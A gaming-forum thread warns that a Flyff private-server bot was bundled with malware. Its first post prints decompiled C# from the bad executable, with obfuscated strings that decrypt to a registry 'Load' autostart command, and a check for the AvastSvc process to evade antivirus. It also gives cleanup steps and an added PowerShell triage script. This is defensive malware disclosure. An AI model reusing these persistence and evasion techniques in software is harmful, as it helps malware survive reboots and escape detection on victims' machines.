
A warning to those who used General Bot!

Discussion on A warning to those who used General Bot! within the Flyff Private Server forum part of the Flyff category.

Old   #1
 
elite*gold: 20
Join Date: Apr 2015
Posts: 418
Received Thanks: 909

The users who downloaded the bot from the thread named are infected with some kind of virus.

This thread is probably in the wrong section, however I decided to post it here because the users who downloaded it most likely don't check the other sections. Also, the original thread is closed.

It contained the following files:
  • farmbot
    • TargetMinimap.exe (bad boy)
  • config.ini (legit)
  • General Bot.exe (legit)
  • hook.dll (confuse file)
  • interface.asi (confuse file)
  • NeuzInfiltration.dll (confuse file)
  • upgrading.dll (confuse file)

Most of the files are files that add extra layers of "confusion" on what is happening to prevent suspicion.

hook.dll is most likely not used due to how the bot worked. It worked by pixel scanning and had nothing to do with memory.

interface.asi is most likely not associated with the bot either. I cannot really speak on this; however, after a little bit of analysis it seems to be a DLL regarding sound.

NeuzInfiltration.dll do I have to say anything on this one? No.

upgrading.dll is a DLL that has been renamed to confuse the user. It was previously Miles Sound System. Company Name: RAD Game Tools, Inc.

General Bot.exe is the legit thing which contains the au3 script as a resource. Not more to say.

farmbot -> TargetMinimap.exe is however the interesting part of this. It is software coded in a .NET language which is protected by SmartAssembly. Some naughty stuff can be found inside of this one.

I have not analysed it thoroughly, however a couple of things caught my attention.

First thing:
Code:
standardInput.Write(string.Concat(new string[]
{
	Class5.smethod_1("ZoZsR/ZaAWzxqaKwo+nWGkxoLc6Ds9GNObStufkfOT2TLcBbjyvMGWz5Ui7BQiviEu7Vk8MO6FJ1iaMc1ALpfry+mE2yigOyL28GnNKe0ab37UCQ2TsndQdis/7A49IH"),
	"%temp%\\",
	Class5.smethod_1("35HUeD+OlAq9ZwumSXi79g=="),
	"\\",
	Class5.smethod_1("2atqj4HZ4WJ029aPZ3Ly2d46DqSi1+THRQs1q+XH92I="),
	".lnk \" /f",
	Environment.NewLine
}));
After decrypting the strings it shows the following:
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "
FlyFF Bot
generalbotstart.exe


The registry key that the bot adds prevents the startup programs from running when restarting the computer. It can be resolved by deleting the key in registry.

Another thing that caught my attention was the following code:
Code:
if (!Class5.smethod_0(Class5.smethod_1("kH6hMrdds0P1ED86mOaZMg==")))
{
	goto IL_D1;
}
IL_C3:
num2 = 11;
Thread.Sleep(26001);
IL_D1:
The decrypted string contains: AvastSvc
It basically is a bit of code to prevent Avast from detecting it as a virus. It is a known method and can be read on the internet.

It has made a copy of TargetMinimap.exe in the following directory: %temp%\FlyFF Bot
Make sure to delete those files and fix the registry as mentioned above. As I said before, I did not analyse it thoroughly, I'm sure it contained more bullshit, so watch out boys.

TL;DR
Delete the key named Load in registry located at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
Go to %temp%\FlyFF Bot in the file explorer and delete the shortcut and the duplicated virus.


Do not restart your computer before you've done these fixes. Otherwise an empty message box will pop up and once you hit ok, the virus will kick in and do a bunch of naughty stuff.



greyb1t is offline  
Thanks
8 Users
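
Added example, not part of greyb1t's post or of any tool mentioned in the thread: a PowerShell triage script for the two artifacts the post names, the Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows and the %temp%\FlyFF Bot folder. It only reports unless run with -Remediate; the script layout and the -Remediate parameter are assumptions of this example.

```powershell
# Added example, not from the thread. Read-only unless -Remediate is given.
param([switch]$Remediate)

$keyPath = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'
$dropDir = Join-Path $env:TEMP 'FlyFF Bot'   # folder name from the decrypted strings

# 1. Autostart value written by the sample's "reg add ... /v Load" command.
$load = (Get-ItemProperty -Path $keyPath -Name 'Load' -ErrorAction SilentlyContinue).Load
$loadHit = $false
if ([string]::IsNullOrWhiteSpace($load)) {
    Write-Output 'Load value: not set'
} else {
    # The value may hold %temp% literally or an already expanded path.
    $target  = [Environment]::ExpandEnvironmentVariables($load)
    $loadHit = $target -like '*\FlyFF Bot\*'
    Write-Output "Load value: $load"
    if ($loadHit) { Write-Warning 'Load points into the FlyFF Bot temp folder' } else { Write-Output 'Load is set but does not match this sample; review by hand' }
}

# 2. Dropped copy and shortcut: list with hashes so they can be recorded first.
$dropExists = Test-Path -LiteralPath $dropDir
if ($dropExists) {
    Get-ChildItem -LiteralPath $dropDir -File -Force | ForEach-Object {
        [pscustomobject]@{
            Name     = $_.Name
            Size     = $_.Length
            Modified = $_.LastWriteTime
            SHA256   = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    } | Format-Table -AutoSize
} else {
    Write-Output "Drop folder not present: $dropDir"
}

# 3. Optional cleanup, limited to the artifacts that matched above.
if ($Remediate) {
    if ($loadHit) {
        Remove-ItemProperty -Path $keyPath -Name 'Load'
        Write-Output 'Removed Load value'
    }
    if ($dropExists) {
        Remove-Item -LiteralPath $dropDir -Recurse -Force
        Write-Output "Removed $dropDir"
    }
}
```

Run it as the affected user, since both the HKCU hive and %temp% are per-user locations.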
Old 05/15/2017, 14:16   #2
 
elite*gold: 0
Join Date: Feb 2010
Posts: 120
Received Thanks: 64
Quote:
Originally Posted by dosha5 View Post
But no one asked you for help.
And you are not a Moderator to post a useless thing like this.
As I said it's a hack section not a scanvirustotal.com.
Learn to know your place little kid.

PS: Hope the Moderator of this section did his job instead of ignoring it because you passed your limits. ^_^
What the f is wrong with you?!

He just wanted to help ppl. who aren't able to reverse engineer.

Dunno why you are so upset about this. Were you part of this little fishy "bot" ?


Hömer is offline  
Thanks
2 Users
Old 05/15/2017, 15:43   #3
 
elite*gold: 0
Join Date: Apr 2011
Posts: 32
Received Thanks: 3
Quote:
Originally Posted by dosha5 View Post
But no one asked you for help.
And you are not a Moderator to post a useless thing like this.
As I said it's a hack section not a scanvirustotal.com.
Learn to know your place little kid.

PS: Hope the Moderator of this section did his job instead of ignoring it because you passed your limits. ^_^
So you think it's fine that there is a public hack released with a virus which could potentially destroy your PC? I hope you aren't that retarded.

This guy is just trying to make others aware. I assume you're working with the guy trying to distribute the virus or something? There's no reason to be angry otherwise, if anything you should be happy.
Exrotz is offline  
Thanks
1 User
Old 05/15/2017, 16:56   #4
 
elite*gold: 0
Join Date: Dec 2012
Posts: 15
Received Thanks: 1
Thanks for the heads up greyb1t!

Also, have you identified the effects of the said virus in case the computer is restarted as the virus "kicks in"?

(I seem to have done it, and I am a bit worried. Sorry for asking too much; I am not as computer savvy as you are.)


Gelz is offline  
Old 05/15/2017, 21:52   #5



 
elite*gold: 61
Join Date: Feb 2011
Posts: 5,804
Received Thanks: 3,337
Arrow Flyff Hacks, Bots, Cheats, Exploits & Macros -> Flyff PServer - D…

I looked into this matter in a secure environment and arrived at the same result, which means that greyb1t is right. Reinstalling your system is strongly recommended, though.

Needless to say, we will take action against the member who published the said bot. Always be careful of newly registered or relatively unknown members!

Thanks for reporting! @


lestryker is offline  
Thanks
3 Users
All times are GMT +2.